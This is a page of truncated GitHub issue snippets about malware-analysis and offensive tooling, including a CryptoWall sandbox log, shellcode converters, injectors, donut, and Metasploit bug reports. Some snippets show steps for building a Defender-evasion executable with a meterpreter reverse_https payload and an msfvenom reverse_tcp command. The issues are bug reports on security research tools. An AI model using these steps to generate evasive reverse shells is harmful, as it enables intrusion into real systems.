-
```
[+] TEB addr is 0x6000
[+] PEB addr is 0x6044
[+] Loading /home/ryancor/Desktop/SandBoxMalware/cryptowall/Windows/SysWOW64/ntdll.dll to 0x10000000
[+] Done with loading /home/ryancor/Desktop/S…
-
**Feature Request or Bug**
Bug
**Describe the feature request or bug**
dotnet run says that submodules are not initialized when I clone the repo with the --recurse-submodules flag.
**To Reprod…
ghost updated
3 years ago
-
Hi,
I am playing with Windows shellcodes, as it requires windows memory structures to get the TEB etc., I need to use an actual sandbox.
I am doing running `python ~/tools/malware/miasm/example/…
-
your pe coverter has limitations but i was able to get from https://github.com/daVinci13/Exe2shell . when testing converted with runshc to check converted PE it keep crashing but showing
[*] Read…
-
Hi,
I am trying to figure out how to properly use the injector. Does it work with DLL's? I don't see any manual mapping or fixing of relocs etc in injector code but I am still familiarizing myself.…
-
Hi,
I try to test your tool on debian 10 with Pyana (https://github.com/PyAna/PyAna/blob/master/Samples/UrlDownloadToFile.sc) shellcode sample UrlDownloadToFile.sc .
I get multi errors:
- first: …
lprat updated
4 years ago
-
The OS version of Windows 2008 R2 SP1 is `6.1.7601`, donut works great from this version to latest Windows 2019. But on OS slightly older, it just won't run.
### Environment
* Windows 2008 R2 wi…
-
## Steps to reproduce
How'd you do it?
1. Use evasion/windows/windows_defender_exe
2. Set payload windows/meterpreter/reverse_https
3. Set listener options
4. run (generates the exe)
5. sta…
-
#### Test case
[ 85a6aa581ffa0514149f3267c41681d27600adbe6ca7b35ee328ec3b3d9f749c](https://www.virustotal.com/gui/file/85a6aa581ffa0514149f3267c41681d27600adbe6ca7b35ee328ec3b3d9f749c/details) - a Kr…
-
## Steps to reproduce
Metasploit 4.0.5, Alpha E
Kali Linux 4.19.0-kali4-amd64
Target VM : Windows 10
How'd you do it?
1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform window…